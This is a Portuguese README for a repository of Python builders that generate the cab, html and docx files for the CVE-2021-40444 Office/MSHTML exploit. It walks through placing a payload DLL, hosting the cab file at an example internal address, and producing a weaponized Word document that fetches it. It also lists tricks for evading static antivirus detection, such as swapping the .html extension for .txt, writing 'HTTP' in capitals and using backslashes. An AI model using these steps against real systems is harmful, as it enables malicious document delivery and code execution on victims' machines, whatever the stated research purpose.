
Este repositório contém construtores de arquivo cab, arquivo html e arquivo docx para o exploit CVE-2021-40444
Construtores CVE-2021-40444
Este repositório contém construtores de arquivo cab, arquivo html e arquivo docx para o exploit CVE-2021-40444. Este repositório é apenas para fins de teste, pesquisa e educacionais. Você é responsável pela forma como usa o código fornecido neste repositório.
O código foi desenvolvido através da engenharia reversa de amostras de malware encontradas na natureza e compartilhadas por vários pesquisadores de segurança.
Os construtores para este CVE já são públicos. O objetivo deste repositório é verificar quão efetivamente podemos contornar as detecções estáticas de diferentes fornecedores de AV para os arquivos docx, no momento em que escrevo.
O código JS pode ser facilmente ofuscado por ferramentas online ou manualmente. Mas o arquivo docx contém apenas um arquivo, que é o document.xml.rels, no qual as assinaturas podem ser baseadas. O que podemos adulterar nele para evadir as detecções estáticas da maioria dos AVs.
O cabrc.exe é um executável da Microsoft incluído no Internet Explorer Administration Kit e pode ser baixado de https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/ieak-information-and-downloads e após a instalação você encontrará este executável em "C:\Program Files (x86)\Windows IEAK 11"
Existem 3 construtores.
O código funciona para python 2.7
Primeiro vá para a pasta CVE-2021-40444 e coloque seu arquivo dll lá e renomeie-o para IEcache.inf (ou você pode usar a dll de calculadora já existente).
Em seguida, vá para a pasta source e gere o arquivo cab
c:\cve-2021-40444\sources\python generate_cab.py
Carregue seu arquivo cab e, usando a URL do arquivo cab, gere o arquivo html
c:\cve-2021-40444\sources\python generate_html.py http://192.168.1.12/new/winupdate.cab tests.txt (Nota: ao invés de usar extensão html, se usarmos .txt o exploit ainda funciona, mas contorna o AV)
Agora, finalmente, carregue seu arquivo html e gere o arquivo doc. Use HTTP (maiúsculo) em vez de http, e "" em vez de "/", para contornar o AV. E também não precisamos de x-usc:.
example: c:\cve-2021-40444\sources\python generate_doc.py HTTP:\\192.168.1.12\new\tests.txt
O resultado está à sua frente.


www.aslitsecurity.com
[email protected]